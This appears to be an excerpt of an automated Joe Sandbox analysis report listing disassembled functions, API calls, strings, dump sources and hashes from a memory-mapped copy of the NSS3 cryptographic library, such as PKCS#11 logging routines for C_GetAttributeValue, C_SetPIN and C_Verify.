NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C585DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C585E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6C585E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6C585E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C585EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C585ED9
SECKEY_SignatureLen.NSS3(?), ref: 6C585F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C585F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C585F89
free.MOZGLUE(?), ref: 6C585FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C585FB6
free.MOZGLUE(00000000), ref: 6C585FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C58600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C586079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C586084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C586094

Strings

, xrefs: 6C585EEB

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: ec510c09f1dd2b43337d770fa982d3dba3a3010f43c2c3a516f5453445ae0170
Instruction ID: 9a20590108214b6cc07c5a03464998966af13ead340344cf59f8f643c7998de2
Opcode Fuzzy Hash: ec510c09f1dd2b43337d770fa982d3dba3a3010f43c2c3a516f5453445ae0170
Instruction Fuzzy Hash: 3F81F6B1E022259BEB10CF64CC81BAE77B5AF44318F544568E81BA7791E731ED04CBE1

Function 6C5A4E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C5A4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A4EC7

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C5A4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C5A4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C5A4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C5A4F68

Strings

hObject = 0x%x, xrefs: 6C5A4EF5, 6C5A4F05
ulCount = %d, xrefs: 6C5A4F63
nhl, xrefs: 6C5A4F82, 6C5A4FB2
pTemplate = 0x%p, xrefs: 6C5A4F4A
hSession = 0x%x, xrefs: 6C5A4EA2, 6C5A4EB2
C_GetAttributeValue, xrefs: 6C5A4E7E
(CK_INVALID_HANDLE), xrefs: 6C5A4EC0, 6C5A4F13

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$nhl
API String ID: 1003633598-3520154480
Opcode ID: 63a4d54258b406c629a37081f91ef14a1d8382db12668f1b6913dfae43f0198c
Instruction ID: 92cc181ec54aac99743006e98781d057663fbc84c316cfe8e44d5fd121479eff
Opcode Fuzzy Hash: 63a4d54258b406c629a37081f91ef14a1d8382db12668f1b6913dfae43f0198c
Instruction Fuzzy Hash: 9141D034602105EBDB00CF96DC88F9E77B5EB8630DF04A425E90857B11DB30AD0ACBAE

Function 6C5A4CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C5A4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A4D37

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C5A4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C5A4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C5A4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C5A4E20

Strings

hObject = 0x%x, xrefs: 6C5A4D65, 6C5A4D75
C_GetObjectSize, xrefs: 6C5A4CEE
nhl, xrefs: 6C5A4DD4, 6C5A4DFF
pulSize = 0x%p, xrefs: 6C5A4DB7
hSession = 0x%x, xrefs: 6C5A4D12, 6C5A4D22
(CK_INVALID_HANDLE), xrefs: 6C5A4D30, 6C5A4D83
*pulSize = 0x%x, xrefs: 6C5A4E1B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nhl
API String ID: 1003633598-3300156537
Opcode ID: 4c7435da911ec1522c2cac092212c54bbbf0904846219b8ee64d7adc647141c0
Instruction ID: 7b843757f0728c6ae19789a442e4df1ec562b1a284dbb7d8a28d5ad6d4d34e59
Opcode Fuzzy Hash: 4c7435da911ec1522c2cac092212c54bbbf0904846219b8ee64d7adc647141c0
Instruction Fuzzy Hash: 1541B171602104EFDB009FD6DCC8B6E77B5EB8630DF049425E9086BA11DB31AD49CAAE

Function 6C5A7C90 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6C5A7CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A7CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A7CF3

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A7D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C5A7D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C5A7D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C5A7D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C5A7D77

Strings

pData = 0x%p, xrefs: 6C5A7D25
ulSignatureLen = %d, xrefs: 6C5A7D72
ulDataLen = %d, xrefs: 6C5A7D40
nhl, xrefs: 6C5A7D8F, 6C5A7DC3
C_Verify, xrefs: 6C5A7CB1
hSession = 0x%x, xrefs: 6C5A7CCE, 6C5A7CDE
(CK_INVALID_HANDLE), xrefs: 6C5A7CEC
pSignature = 0x%p, xrefs: 6C5A7D59

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify$nhl
API String ID: 1003633598-606874536
Opcode ID: b9f192635cfd3740634dee22834a58ae5fe2da73e49bdf33fe5161c605fbd192
Instruction ID: 9e580415ec90c6f906b939fc2750b8ebb9cf141a6974dcb1e859e17684102e13
Opcode Fuzzy Hash: b9f192635cfd3740634dee22834a58ae5fe2da73e49bdf33fe5161c605fbd192
Instruction Fuzzy Hash: 2B31F335602151EFDB10DF96DD88E6E7BF1EB86318F088465E90857A11DB30AC4ACBAD

Function 6C5A2F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C5A2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A2F63

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C5A2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C5A2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C5A2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C5A2FE7

Strings

C_SetPIN, xrefs: 6C5A2F21
nhl, xrefs: 6C5A2FFF, 6C5A3030
hSession = 0x%x, xrefs: 6C5A2F3E, 6C5A2F4E
ulOldLen = %d, xrefs: 6C5A2FB0
(CK_INVALID_HANDLE), xrefs: 6C5A2F5C
pNewPin = 0x%p, xrefs: 6C5A2FC9
pOldPin = 0x%p, xrefs: 6C5A2F95
ulNewLen = %d, xrefs: 6C5A2FE2

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$nhl
API String ID: 1003633598-972012246
Opcode ID: fe366f4d73e3ec24ade72ed7d991dece7225bf6388ff7afb14cdc1edf61bc0f5
Instruction ID: f8cddfebdb4fdd7caac7ceb15958c0172b03a7e7e7780eb70c628d0fd51e8f4d
Opcode Fuzzy Hash: fe366f4d73e3ec24ade72ed7d991dece7225bf6388ff7afb14cdc1edf61bc0f5
Instruction Fuzzy Hash: 9B31C335602144EFCB00DF97DD8DE5E7BB1EB8A31DF048455E90867A11DB30AC49CBA9

Function 6C689C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C689C70
PR_NewLock.NSS3 ref: 6C689C85

Part of subcall function 6C6398D0: calloc.MOZGLUE(00000001,00000084,6C560936,00000001,?,6C56102C), ref: 6C6398E5

PR_NewCondVar.NSS3(00000000), ref: 6C689C96

Part of subcall function 6C55BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C5621BC), ref: 6C55BB8C

PR_NewLock.NSS3 ref: 6C689CA9

Part of subcall function 6C6398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C639946
Part of subcall function 6C6398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4F16B7,00000000), ref: 6C63994E
Part of subcall function 6C6398D0: free.MOZGLUE(00000000), ref: 6C63995E

PR_NewLock.NSS3 ref: 6C689CB9
PR_NewLock.NSS3 ref: 6C689CC9
PR_NewCondVar.NSS3(00000000), ref: 6C689CDA

Part of subcall function 6C55BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C55BBEB
Part of subcall function 6C55BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C55BBFB
Part of subcall function 6C55BB80: GetLastError.KERNEL32 ref: 6C55BC03
Part of subcall function 6C55BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C55BC19
Part of subcall function 6C55BB80: free.MOZGLUE(00000000), ref: 6C55BC22

PR_NewCondVar.NSS3(?), ref: 6C689CF0
PR_NewPollableEvent.NSS3 ref: 6C689D03

Part of subcall function 6C67F3B0: PR_CallOnce.NSS3(6C6D14B0,6C67F510), ref: 6C67F3E6
Part of subcall function 6C67F3B0: PR_CreateIOLayerStub.NSS3(6C6D006C), ref: 6C67F402
Part of subcall function 6C67F3B0: PR_Malloc.NSS3(00000004), ref: 6C67F416
Part of subcall function 6C67F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C67F42D
Part of subcall function 6C67F3B0: PR_SetSocketOption.NSS3(?), ref: 6C67F455
Part of subcall function 6C67F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C67F473

Part of subcall function 6C639890: TlsGetValue.KERNEL32(?,?,?,6C6397EB), ref: 6C63989E

EnterCriticalSection.KERNEL32(?), ref: 6C689D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C689DAF
_PR_CreateThread.NSS3(00000000,6C689EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C689D9F

Part of subcall function 6C55B3C0: TlsGetValue.KERNEL32 ref: 6C55B403
Part of subcall function 6C55B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C55B459

_PR_CreateThread.NSS3(00000000,6C68A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C689DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C689DFC
_PR_CreateThread.NSS3(00000000,6C68A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C689E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C689E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C689E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C689E89

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 6473aef035d5ad4b2633530caeee0d1afb24adf171e38ebded243cf7ccb251a7
Instruction ID: 64d2b171b4d4983c67b086d913f1d9e9eaf6e3e19382ecb5ebe27dcda64943fd
Opcode Fuzzy Hash: 6473aef035d5ad4b2633530caeee0d1afb24adf171e38ebded243cf7ccb251a7
Instruction Fuzzy Hash: E2614CB1901706AFD710DF75C848A67BBF8FF49308B14452AE84AC7B11EB30E815CBA9

Function 6C583FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

SECKEY_CopyPublicKey.NSS3(?), ref: 6C584014

Part of subcall function 6C5839F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C585E6F,?), ref: 6C583A08
Part of subcall function 6C5839F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C585E6F), ref: 6C583A1C
Part of subcall function 6C5839F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C583A3C

PORT_NewArena_Util.NSS3(00000800), ref: 6C584038

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C58404D

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C69A0F4), ref: 6C5840C2

Part of subcall function 6C5CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C5CF0C8
Part of subcall function 6C5CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5CF122

SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C58409A

Part of subcall function 6C5CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C57E708,00000000,00000000,00000004,00000000), ref: 6C5CBE6A
Part of subcall function 6C5CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5804DC,?), ref: 6C5CBE7E
Part of subcall function 6C5CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5CBEC2

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5840DE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5840F4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C584108
SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C58411A
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C584137
SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C584150
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C69A1C8), ref: 6C58417E
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C584194
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C5841A7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5841B2
PK11_DestroyObject.NSS3(?,?), ref: 6C5841D9
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5841FC
SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C69A1A8), ref: 6C58422D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
String ID:
API String ID: 912348568-0
Opcode ID: 74491177d9ea8065802948defeb081c78a3fb114b6da2d9ee478c6bba7f96431
Instruction ID: 29b9bcaf8dc9f52d8eae037c9bd6c9e2df519229e07625a6b31191a100d21a29
Opcode Fuzzy Hash: 74491177d9ea8065802948defeb081c78a3fb114b6da2d9ee478c6bba7f96431
Instruction Fuzzy Hash: E05139B5B05310ABF7109B699C51B6776DCDF9024CF044A2DEC5AC6F82FB31E9088266

Function 6C56F850 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 262COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE004,00000000), ref: 6C56F86F

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PR_smprintf.NSS3(%lu,?), ref: 6C56F899
PR_smprintf.NSS3(%s.%lu,00000000,?), ref: 6C56FA4E
PR_smprintf.NSS3(%s.%llu,00000000,00000000,00000000), ref: 6C56FAA2
PR_smprintf.NSS3(%s.UNSUPPORTED,00000000), ref: 6C56FAB6
free.MOZGLUE(00000000), ref: 6C56FAC1
PR_smprintf.NSS3(OID.UNSUPPORTED), ref: 6C56FAD3
PR_smprintf.NSS3(OID.%llu.%llu,00000000,?,00000000,FFFFFFD8,00000000,00000000,00000028,00000000), ref: 6C56FB4B

Strings

OID.%llu.%llu, xrefs: 6C56FB46
%s.UNSUPPORTED, xrefs: 6C56FAB1
%s.%llu, xrefs: 6C56FA9D
%s.%lu, xrefs: 6C56FA49
OID.UNSUPPORTED, xrefs: 6C56FACE
OID.%lu.%lu, xrefs: 6C56FA7D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: R_smprintf$ErrorValuefree
String ID: %s.%llu$%s.%lu$%s.UNSUPPORTED$OID.%llu.%llu$OID.%lu.%lu$OID.UNSUPPORTED
API String ID: 682930370-3523515424
Opcode ID: c4a03c026da6066ccd716e474d44507ffc62c3f1aafe3df49afd507fa0fd4645
Instruction ID: 3d905ec08bb38a4e26303b8ed91d21ec27667fe0afd43b48033c456d2adfb9c0
Opcode Fuzzy Hash: c4a03c026da6066ccd716e474d44507ffc62c3f1aafe3df49afd507fa0fd4645
Instruction Fuzzy Hash: 66816D72E150314BEB088B6E8C5577EBFA2DBC6304F1847A9E461DBF65EA708805C764

Function 6C5C8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C5C8E01,00000000,6C5C9060,6C6D0B64), ref: 6C5C8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C5C8E01,00000000,6C5C9060,6C6D0B64), ref: 6C5C8E9E
PORT_ArenaAlloc_Util.NSS3(6C6D0B64,00000001,?,?,?,?,6C5C8E01,00000000,6C5C9060,6C6D0B64), ref: 6C5C8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C5C8E01,00000000,6C5C9060,6C6D0B64), ref: 6C5C8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C5C8E01,00000000,6C5C9060,6C6D0B64), ref: 6C5C8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C5C8E01,00000000,6C5C9060,6C6D0B64), ref: 6C5C8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C5C8E01), ref: 6C5C8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6D0B64,6C6D0B64), ref: 6C5C8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C5C8F3F

Part of subcall function 6C5CA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C5CA421,00000000,00000000,6C5C9826), ref: 6C5CA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5C904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C5C8E76

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
